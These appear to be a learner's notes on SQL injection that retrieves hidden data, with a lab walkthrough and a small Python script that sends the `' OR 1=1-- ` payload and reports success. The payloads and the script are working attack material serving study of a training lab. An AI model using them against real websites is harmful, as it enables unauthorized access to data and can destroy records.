# Retrieving hidden data
---
Consider a shopping application that displays product in different categories. When the user clicks on the Gifts category, their browser requests the URL:
```html
https://insecure-website.com/products?category=Gifts
```

This causes the application to make a SQL query to retrieve details of the relevant products from the database:
```sql
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```

This SQL query asks the database to return:
- all details (\*)
- from the products table
- where the category is _Gifts_
- and released is 1

The restriction `released = 1` is being used to hide products that are not released. For unreleased products, presumably `released = 0`.
The application doesn't implement any defenses againts SQLi attacks, so an attacker can construct an attack like:
```html
https://insecure-website.com/products?category=Gifts'--
```

This results in the SQL query:
```sql
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
```

- The key thing here is that the _double-dash_ sequence `--` is a comment indicator in SQL, and means that the rest of the query is interpreted as a comment.
- This effectively removes the remainder of the query, so it no longer includes `AND released = 1`.
- This means that all products are displayed, including unrealeased products.

Going futher, an attacker can cause the application to display all the products in any category, including categories that they don't know about:
```html
https://insecure-website.com/products?category=Gifts'+OR+1=1--
```

This results in the SQL query:
```sql
SELECT * FROM products WHERE category = 'Gift' OR 1=1--' AND released = 1
```
The modified query will return all items where either the category is _Gifts_, or _1_ is equal to _1_. Since `1=1` is always true, the query will return all items.

>[!warning]
> Take care when injecting the condition `OR 1=1` into a SQL query. Although this may be harmless. However, it's common for applications to use data from a single request in multiple different queries. If your condition reaches an `UPDATE` or `DELETE` statement, this can result in an accidental loss of data.


# Lab: SQLi vulnerability in WHERE clause allowing retrieval of hidden data
---
1. intercept this link `https://0a65007b049969f28030120200e700ef.web-security-academy.net/filter?category=Gifts`
2. put the payload at the end `' OR 1=1-- `
3. it's going to be like this `https://0a65007b049969f28030120200e700ef.web-security-academy.net/filter?category=Gifts%27%20OR%201=1--`
4. solve!

```python
#!/usr/bin/env python3
import sys
import requests

def exploit_sqli(url, payload):
    r = requests.get(url+payload)
    if "Picture Box" in r.text:
        return True
    else:
        return False

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        payload = sys.argv[2].strip()
    except IndexError:
        print("[*] Usage: {} <url> <payload>".format(sys.argv[0]))
        print('[*] Example: {} http://example.com "\' OR 1=1-- "'.format(sys.argv[0]))
        sys.exit(1)

    if exploit_sqli(url, payload):
        print("[*] SQL injection successful.")
    else:
        print("[*] SQL injection not successful.")
```